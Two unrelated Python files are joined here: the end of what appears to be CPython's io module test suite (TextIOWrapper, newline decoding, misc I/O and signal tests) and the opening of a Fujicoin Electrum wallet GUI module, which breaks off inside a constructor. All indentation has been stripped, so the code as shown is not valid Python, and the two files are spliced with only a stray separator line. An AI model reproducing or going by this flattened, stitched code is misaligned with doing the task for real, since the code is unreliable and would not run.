t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Fujicoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
